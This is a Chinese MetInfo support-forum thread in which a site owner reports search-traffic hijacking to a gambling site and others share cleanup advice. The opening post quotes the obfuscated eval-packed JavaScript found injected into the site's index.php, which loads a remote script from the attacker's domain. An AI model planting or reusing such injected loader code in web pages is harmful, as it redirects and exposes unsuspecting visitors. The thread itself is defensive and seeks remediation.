请选择 进入手机版 | 继续访问电脑版
因履行网络发帖实名认证等法规义务,本论坛已永久关闭,如需在线交流,请移步“米拓在线问答平台

MetInfo交流平台

 找回密码
 立即注册
搜索
热搜: 模板配置 6.0
查看: 11057|回复: 6

suxinhuahui.com搜索被搜索引擎劫持攻击

[复制链接]
发表于 2017-12-23 11:17:41 | 显示全部楼层 |阅读模式
前几天发现我的网站www.suxinhuahui.com在百度搜索、360搜索,关键字搜索“素馨花卉”后,点击搜索结果被跳转到一个博彩3063y的网站,但是直接输入域名是没有问题的。。

把网站下载下来,搜索全文关键字 3063y,在根目录下的index.php下搜索到这么一段代码。。。。。

<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5("<0 6=\'1://2.3.a/b.c\' 7=8/9></0>");',13,13,'script|http|www|3063e|document|writeln|src|type|text|javascript|com|3063y|js'.split('|'),0,{}))
</script>


那么问题来了,我这段代码的恶意植入,是我的阿里云服务器出现了漏洞,还是Metinfo有了漏洞呢
回复

使用道具 举报

发表于 2017-12-23 13:51:14 | 显示全部楼层
应该是黑客利用了系统漏洞入侵了,你先修改首页代码,然后到百度去提交申诉,这段时间仔细观察,看看还会不会被入侵篡改,后台账号、密码还有登陆文件夹名称切记需要使用较复杂的字符
回复

使用道具 举报

发表于 2017-12-26 15:03:31 | 显示全部楼层
我想问下你: 你后台是不是安装了采集的这个应用?
回复

使用道具 举报

发表于 2018-4-13 11:14:27 | 显示全部楼层
我的网站也这样,后来解决了吗?我更新后,依然会被自动更改。
回复

使用道具 举报

发表于 2018-4-13 17:50:12 | 显示全部楼层
我的网站也是一直 被这样篡改,刚买了个阿里云的空间还没 转过去呢,看来不是空间问题,
回复

使用道具 举报

发表于 2018-4-13 18:34:27 | 显示全部楼层
之前被黑客攻击过的用户转空间和清理文件后,务必记得清理数据库
回复

使用道具 举报

 楼主| 发表于 2018-5-14 21:29:22 | 显示全部楼层
hry23@163.com 发表于 2018-4-13 11:14
我的网站也这样,后来解决了吗?我更新后,依然会被自动更改。

您好,客服建议重装网站,考虑到很多内容需要重做,就没这么做。我们是逐个查找异常的.php文件,比如我们在图片库(/upload)找到几个异常的.php文件,验证后,的确是木马植入代码文件,删除后这些可执行木马文件后,再替换index.php;然后用mentinfo后台有个对比异常文件的功能,把显示异常的都更换成原始文件;最后,后台别用默认的/admin,更改成只有你自己知道的。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|MetInfo ( 湘ICP备07500799号 )

GMT+8, 2019-5-23 03:23 , Processed in 0.022274 second(s), 14 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表